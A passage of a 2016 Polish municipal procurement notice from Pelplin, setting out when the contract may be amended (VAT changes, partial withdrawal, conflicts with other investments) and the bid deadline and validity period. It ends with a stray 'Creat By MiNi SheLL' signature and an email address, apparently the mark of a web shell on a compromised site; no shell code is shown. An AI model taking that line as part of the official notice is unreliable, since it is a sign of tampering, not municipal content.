a)	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
b)	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
c)	 rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługuje  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowaniami  świadczeniami,
d)	kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej w specyfikacji IWZ i ofercie wykonawcy,
e)	 zmiany  uzasadnione  okolicznościami, o których  mowa w art. 357 Kc z uwzględnieniem  faktu, że  za rażącą  zostanie uznana strata w wysokości, o  której mowa w art. 397 Ksh.
4. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pelplin.pl->bip->przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pelplin.pl->bip->przetargi.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2016 godzina 10:00, miejsce: Urząd Miasta i Gminy Pelplin, Plac Grunwaldzki 4, 83-130 Pelplin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com